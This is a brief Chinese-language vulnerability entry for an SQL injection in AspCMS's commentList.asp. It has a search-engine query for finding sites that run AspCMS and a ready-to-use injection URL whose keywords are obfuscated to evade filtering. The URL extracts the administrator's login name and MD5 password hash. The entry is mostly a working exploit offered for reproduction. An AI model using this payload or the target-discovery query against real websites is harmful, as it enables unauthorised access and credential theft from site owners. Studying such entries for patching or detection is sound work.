AspCMS commentList.asp SQL注入漏洞
一、漏洞简介
AspCMS commentList.asp 存在SQL注入漏洞,攻击者通过漏洞可以获取管理员md5的密码
二、影响版本
- AspCMS
三、资产测绘
- hunter
app.name="AspCMS"
- 特征
通过网站源码判断CMS
四、漏洞复现
/plug/comment/commentList.asp?id=-1%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now(),null,1%20%20frmasterom%20{prefix}user成功获取管理员账号以及密码的MD5